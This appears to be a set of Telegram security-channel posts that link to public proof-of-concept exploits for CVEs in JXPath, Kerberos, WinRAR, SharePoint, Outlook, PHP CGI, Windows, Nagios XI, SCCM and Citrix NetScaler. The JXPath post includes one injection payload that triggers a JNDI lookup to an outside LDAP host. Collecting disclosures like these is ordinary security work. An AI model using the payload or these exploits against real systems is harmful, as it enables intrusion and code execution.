⚙️ Apache Commons Jxpath (CVE-2022-41852)
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
👍9🔥2
🔑 Abuse Kerberos RC4 (CVE-2022-33679)
This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.
Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
Exploit:
https://github.com/Bdenneu/CVE-2022-33679
#ad #kerberos #rc4 #exploit
This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.
Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
Exploit:
https://github.com/Bdenneu/CVE-2022-33679
#ad #kerberos #rc4 #exploit
🔥6👍2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
WinRAR <= 6.22: code execution PoC
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
#git #exploit #pentest #redteam #fishing #initial
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
#git #exploit #pentest #redteam #fishing #initial
👍6
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam #git
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam #git
GitHub
GitHub - Chocapikk/CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege Vulnerability
Microsoft SharePoint Server Elevation of Privilege Vulnerability - Chocapikk/CVE-2023-29357
👍5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
🔥5❤2👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-4577: PHP CGI Argument Injection (RCE)
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
on Windows
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
GitHub
GitHub - watchtowrlabs/CVE-2024-4577: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC - watchtowrlabs/CVE-2024-4577
🔥8👍3👎1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-26229: Windows LPE
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
PATCHED: Apr 9, 2024
https://github.com/RalfHacker/CVE-2024-26229-exploit
P.S. Чуть поправил оригинальный эксплоит
#git #exploit #lpe #pentest #redteam
🔥7👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-30088: Windows LPE
PATCHED: June 11, 2024
https://github.com/tykawaii98/CVE-2024-30088
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
PATCHED: June 11, 2024
https://github.com/tykawaii98/CVE-2024-30088
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
❤🔥7🔥1
Nagios XI 2024R1.01 has a vulnerability in the
monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution. 🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401
#nagios #sql #rce #privesc #poc #exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-43468: ConfigMgr/SCCM 2403 Unauth SQLi to RCE
PATCHED: Oct 8, 2024
Exploit: https://github.com/synacktiv/CVE-2024-43468
Blog: https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
#git #exploit #ad #rce #sccm #pentest #redteam
PATCHED: Oct 8, 2024
Exploit: https://github.com/synacktiv/CVE-2024-43468
Blog: https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
#git #exploit #ad #rce #sccm #pentest #redteam
GitHub
GitHub - synacktiv/CVE-2024-43468
Contribute to synacktiv/CVE-2024-43468 development by creating an account on GitHub.
🔥5👍2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🩸 CitrixBleed 2 — Citrix NetScaler Memory Leak (CVE-2025-5777)
Critical memory leak vulnerability in Citrix NetScaler ADC/Gateway. Sending malformed POST request with login parameter without value causes server to return ~127 bytes of uninitialized stack memory, including session tokens, enabling MFA bypass and active session hijacking.
🔗 Research:
https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/
🔗 Source:
https://github.com/win3zz/CVE-2025-5777
#citrix #netscaler #memoryleak #exploit
Critical memory leak vulnerability in Citrix NetScaler ADC/Gateway. Sending malformed POST request with login parameter without value causes server to return ~127 bytes of uninitialized stack memory, including session tokens, enabling MFA bypass and active session hijacking.
🔗 Research:
https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/
🔗 Source:
https://github.com/win3zz/CVE-2025-5777
#citrix #netscaler #memoryleak #exploit
👍13❤8🔥7